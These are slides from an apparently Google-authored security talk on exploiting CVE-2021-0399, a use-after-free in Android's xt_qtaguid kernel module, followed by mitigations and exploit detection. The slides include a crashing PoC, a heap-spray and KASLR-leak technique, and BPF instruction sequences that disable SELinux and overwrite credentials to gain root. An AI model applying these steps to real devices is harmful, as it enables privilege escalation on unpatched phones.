Scribd
Upload
22 views52 pages

UAF by Ret2bpf

The document discusses the exploitation of a Use-After-Free (UAF) vulnerability (CVE-2021-0399) in the Android kernel's netfilter module, specifically the xt_qtaguid. It details the vulnerability analysis, the exploitation process, and potential mitigations, including techniques for detecting exploit code at scale. The authors, security engineers from Google's Android Security Team, provide insights into the kernel internals and the implications of the exploit on Android devices.

Uploaded by

theatkjonio
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
22 views52 pages

UAF by Ret2bpf

The document discusses the exploitation of a Use-After-Free (UAF) vulnerability (CVE-2021-0399) in the Android kernel's netfilter module, specifically the xt_qtaguid. It details the vulnerability analysis, the exploitation process, and potential mitigations, including techniques for detecting exploit code at scale. The authors, security engineers from Google's Android Security Team, provide insights into the kernel internals and the implications of the exploit on Android devices.

Uploaded by

theatkjonio
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 52

The Art of Exploiting UAF by

Ret2bpf in Android Kernel

Xingyu Jin | Richard Neal


Android Security Team, Google

TRACK 1
Who Are We?
● Xingyu Jin
○ Security Engineer at Google
○ Occasionally play CTFs and hunting kernel bugs.
● Richard Neal
○ Android Malware Research team at Google
○ Security Engineer (and manager)

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 2
Agenda
● Kernel Internals of Android netfilter module xt_qtaguid
○ Known vulnerabilities in the past
● CVE-2021-0399 Vulnerability Analysis
● Exploit CVE-2021-0399
○ Demo on exploiting Android device
● Mitigations
● How does Google detect exploit code at scale

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 3
Android module xt_qtaguid

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 4
xt_qtaguid Introduction
● Data usage monitoring and tracking functionality since Android 3.0
○ Track the network traffic on a per-socket basis for unique app
● Module /dev/xt_qtaguid exists on Android devices since 2011
○ Replaced by eBPF since Android Q
● Userspace sends commands to kernel
○ E.g. TrafficStats.tagSocket API

kernel userspace
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 5
xt_qtaguid Open Device

● Allocate struct uid_tag_data for


every unique uid
● Allocate struct proc_qtu_data for
every unique pid
● N:1

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 6
xt_qtaguid Tag Socket (ctrl_cmd_tag)
● Read socket fd, tag and uid from userspace
○ sscanf(input, "%c %d %llu %u", &cmd, &sock_fd, &acct_tag, &uid_int);
● Creating tag_ref and sock_tag

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 7
xt_qtaguid
● Tag socket(ctrl_cmd_tag) VS Untag socket(ctrl_cmd_untag->qtaguid_untag)

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 8
Vulnerability Analysis & Exploitation

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 9
CVE-2016-3809
● Kernel Information Leak
● Read /proc/net/xt_gtaguid/ctrl and obtain the kernel address of socket structure
○ sock=0xffffffc01855bb80, …
○ Strengthen CVE-2015-3636, ... exploits :-/
● You may still find OEM devices after 2017 with this bug :-/

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 10
CVE-2017-13273
● Race condition due to incorrect locking
○ UAF on tag_ref_tree
● From 2011 to 2020, 2 vulnerabilities were reported in xt_qtaguid.c
○ 1 kernel heap information leak
○ 1 UAF by race

● What can possibly go wrong in 2021?

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 11
● Discovered by external researcher
○ In xt_qtaguid.c, there is a potential UAF.
○ No PoC or exploitation details provided but researcher believes it’s
impossible to exploit on modern devices which enable
CONFIG_ARM64_UAO
● Minimal crashing PoC by Richard: tag_socket(sock_fd, /*tag=*/0x12345678, getuid());
fork_result = fork();
if (fork_result == 0) {
untag_socket(sock_fd);
} else {
(void)waitpid(fork_result, NULL, 0);
}
exit(0);
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 12
● Untag socket(ctrl_cmd_untag->qtaguid_untag)...
○ Find corresponding proc_qtu_data based on pid.
○ Remove sock_tag from proc_qtu_data.list.
○ Free sock_tag.

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 13
● An application may call fork and untag the socket in the child
process
○ So pqd_entry == NULL
● Kernel complains about the unexpected situation but doing nothing
● sock_tag_entry->list is not removed but sock_tag_entry is freed
○ UAF

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 14
Exploit CVE-2021-0399
Own your Android!
SELINUX, SECCOMP, KASLR, PAN, PXN, ADDR_LIMIT_CHECK, CONFIG_ARM64_UAO
CONFIG_SLAB_FREELIST_RANDOM CONFIG_SLAB_FREELIST_HARDENED
Targeting at recent device manufactured in 2019-2020
Security Patch level 2021 Jan + Android Pie & Kernel 4.14
(e.g. Xiaomi Mi9, OnePlus 7 Pro)

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 15
Step 0 - eventfd leaks kernel heap address
● Most devices use kmalloc-128 as the minimal size of the slab object
○ E.g. the size of the object by kmalloc(/*obj_size=*/10) is 128 bytes

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 16
● Child process calls ctrl_cmd_untag
○ sock_tag is freed
○ Spray eventfd

17
● Untag another sock_tag: unlink
○ sock_tag->prev->next = sock_tag->next

eventfd_ctx->count = &list_head
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 18
● Read /proc/self/fdinfo/$fd
○ Info leak for the head node

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 19
Step 1 - Double Free on kmalloc-128
● Naive try
○ Close the device(qtudev_release), will it free the sock_tag again?
○ qtudev_release will put all unlinked sock_tag to st_to_free_tree and free
them later

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 20
● Naive try
○ Kernel crash
● The security check in qtudev_release is rigorous
● qtudev_release will check if the tag is valid or not
○ tag_ref doesn’t exist? Crash
○ When socket is untagged, tr->num_sock_tags is dereferenced as 0x0
○ BUG_ON(tr->num_sock_tags <= 0);

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 21
● Head node leaked
● Free tag B by child(UAF)
● Untag tag C by parent
○ Leak the address of tag D

22
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal
● Spray on B, D with carefully crafted data for bypassing kernel checks
● Tag impersonation: “B”->”E”, “D”->”F”
● Free sprayed buffer: __rb_parent_color should be accessible for
rb_erase

23
One more thing: CVE-2021-0399 + CVE-2016-3809
● When qtudev_release is called, sock_put(st_entry->sk) will be invoked
● Kernel socket UAF
● Time travel
○ CVE-2015-3636(pingpong)
○ CVE-2017-11176(mq_notify double sock_put)
○ ...

24
Step 2 - KASLR leak
● sizeof(struct sock_tag) == 64, kmalloc-128 object == 2 sock_tag

Kernel calls
- kfree(sock_tag)
- kfree(sock_tag + 0x40)

25
● Consider spraying slab at the beginning of the exploit

● Open /proc/cpuinfo
○ Kernel will allocate seq_file structures
○ seq_file <-> eventfd_ctx
■ slab might look like this

26
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal
● Leak
○ eventfd_ctx->count now becomes const struct
seq_operation* op
○ Spinlock still works
● Kernel ASLR leak on Xiaomi Mi9 device (released on 2019)

27
Step 3 - Rooting (possible primitives)
● If CONFIG_SLAB_FREELIST_HARDENED is not enabled
○ Double free => KSMA(Kernel Space Mirroring Attack)
● Primitive Candidate: sk_put(sk) where you can control sk
○ dec(sk->__sk_.common.skc_refcnt) if sk->sk_wmem_alloc > 0
○ Possible ways to disable selinux and kptr_restrict
■ Depends on the kernel image
■ Disable kptr_restrict -> CVE-2016-3809 socket struct info
leak -> sock UAF!

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 28
Controlling seq_operations
● Primitive: Overwriting seq_operations
○ write(fd, &offset, sizeof(offset) will overwrite seq_operations
○ Overwrite cpuinfo_op to consoles_op, so we can find the file descriptor of
the overlapped seq_file
● Overwrite seq_operations to a leaked heap address

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 29
Overwriting addr_limit?
● Because of two overlapped seq_file, you may control first 64 bytes of the
seq_file overlapped with the eventfd by another heap spray
● Old trick: ROP on kernel_getsockopt
○ Unfortunately it doesn’t work on 4.14 arm64
■ addr_limit_user_check is against tampering addr_limit
■ CONFIG_ARM64_UAO(enabled by default in 4.14) is against
tampering addr_limit

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 30
The Ultimate ROP
● As mentioned by Project Zero blog post “an ios hacker tries android”, Jann
Horn recommends using ___bpf_prog_run for building ROP gadget
● Invoke arbitrary bpf instructions without verification
○ Arbitrary kernel R&W primitive
○ Turn off kptr_restrict & SELINUX
● Example for turning off SELINUX
○ BPF_LD_IMM64(BPF_REG_2, selinux_enforcing_addr)
○ BPF_MOV64_IMM(BPF_REG_0, 0)
○ BPF_ST_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0x0)
○ BPF_EXIT_INSN()

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 31
Root shell
● Once kptr_restrict is turned off, we can get a leaked sock address
● Hammer sock->sk_peer_cred with BPF instructions in a leaked kmalloc-128
object:
○ BPF_LD_IMM64(BPF_REG_2, sk_addr)
○ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 568)
○ BPF_MOV64_IMM(BPF_REG_0, 0x0)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 4)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 12)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 20)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 28)
○ BPF_MOV64_IMM(BPF_REG_0, -1)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 40)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 48)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 56)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 64)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 72)
○ BPF_EXIT_INSN()
● Are there other ways to do exploit? Yes
The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 32
● PWN Mi9 device in less than 10 seconds!

33
Detecting & Mitigating Exploitation

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 34
Mitigations

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 35
CONFIG_SLAB_FREEELIST_HARDENED

● Freelist is encrypted -> __rb_parent_color becomes invalid


● signalfd(-1, &sigmask, 0x0)
■ sigmask = ~head_address
■ signalfd_ctx->sigmask =
head_addr | 0x40100
● MCAST_JOIN_GROUP may also work for similar
scenarios
By s
pa ign
ss alf
ed d
w
ith

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 36
Kernel Electric Fence

● KFENCE is a low-overhead sampling-based memory safety error


detector of heap use-after-free, invalid-free, and out-of-bounds
access errors.
● KFENCE hooks to the SLAB and SLUB allocators.
● Compared to KASAN, KFENCE trades performance for precision.
○ Guarded allocations are set up based on a sample interval

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 37
CONFIG_ARM64_UAO

● Kernel memory access technique


○ Overwrite addr_limit
○ Use pipes to read/write kernel memory
● ARMv8.2-A User Access Override
○ Changes behaviour of LDTR and STTR above EL0
○ Allows Privileged Access Never (PAN) to be enabled all the time
By ret
pa ur
ss n2b
ed p
w f
ith

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 38
Seq_file Isolation / KSMA defense

● seq_file has its dedicated cache


● Researcher Jun Yao also had proposals about making Android
exploitation more difficult by defeating KSMA
○ https://lore.kernel.org/patchwork/cover/912210/

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 39
Kernel Control Flow Integrity

● Blocks attackers from redirecting the flow of execution


● Available from 2018 in Android kernel 4.9 and above
○ Uses LTO and CFI from clang
● Relevant change in seq_read:
show = private_data->op->show;
if ( __ROR8__((char *)show - (char *)_typeid__ZTSFiP8seq_filePvE_global_addr, 2) >= 0x184uLL )
_cfi_slowpath(0x5233D5BC7887AE44uLL, private_data->op->show, 0LL);
v31 = show(private_data, (void *)v34);

● Detects the modified show pointer -> panic()

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 40
CONFIG_BPF_JIT_ALWAYS_ON

● Required for Android but not on ARM32


● BPF must use JIT
○ No interpreter
○ ___bpf_prog_run is not compiled, cannot be called

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 41
CONFIG_DEBUG_LIST
● Now required for Android (recommended by Maddie from P0)
● __list_add_valid and __list_del_entry_valid check link pointers:

bool __list_add_valid(struct list_head *new, struct list_head *prev, struct list_head *next) {
if (CHECK_DATA_CORRUPTION(next->prev != prev,
"list_add corruption. next->prev should be prev (%px), but was %px. (next=%px).
\n",
prev, next->prev, next) ||
CHECK_DATA_CORRUPTION(prev->next != next,
"list_add corruption. prev->next should be next (%px), but was %px. (prev=%px).
\n",
next, prev->next, prev) ||
CHECK_DATA_CORRUPTION(new == prev || new == next,
"list_add double add: new=%px, prev=%px, next=%px.
\n",
new, prev, next))
return false;

return true;
}

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 42
Detect Exploits at Scale

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 43
On-Device Protection

● Application verifier
● Similarity analysis against known-bad APKs
● Detection rules
● Advanced Protection

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 44
Backend Infrastructure
● Google Play applications are constantly analysed
● Generation of data
○ Static analysis
■ APK contents
■ Unpacking
■ Deobfuscation
○ Dynamic analysis
● Interpreting data

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 45
Manual Analysis

● Sources
○ Internal collaboration - Android Security Assurance, Project
Zero, TAG, Trust & Safety
○ External reports
● Work
○ Reverse engineering + Research
● Outputs
○ Documentation, new detection techniques / systems

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 46
Behavioural Detection

● What the code does, not what it looks like


● Root exploits need to interact with the kernel

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 47
Behavioural Detection

● eBPF allows monitoring of calls and parameters


● Look for evidence of exploit behaviour, e.g. floods
● Interesting syscalls
○ fsetxattr+inotify
○ getsockopt / setsockopt MCAST_JOIN_GROUP

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 48
CVE-2018-9568

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 49
Summary

● Researchers
○ Keep looking for workarounds
● Users
○ Multiple levels of mitigation block all these techniques
○ Generic Kernel Image will get updates to users faster

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 50
Thank you!

● Thanks Jann Horn for suggesting Android exploitation tips on real


physical Android devices.
● Thanks Ziwai Zhou for donating his Mi9 device.

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 51
Thank You for Joining Us
Join our Discord channel to discuss more or ask questions
https://discord.gg/dXE8ZMvU9J

You might also like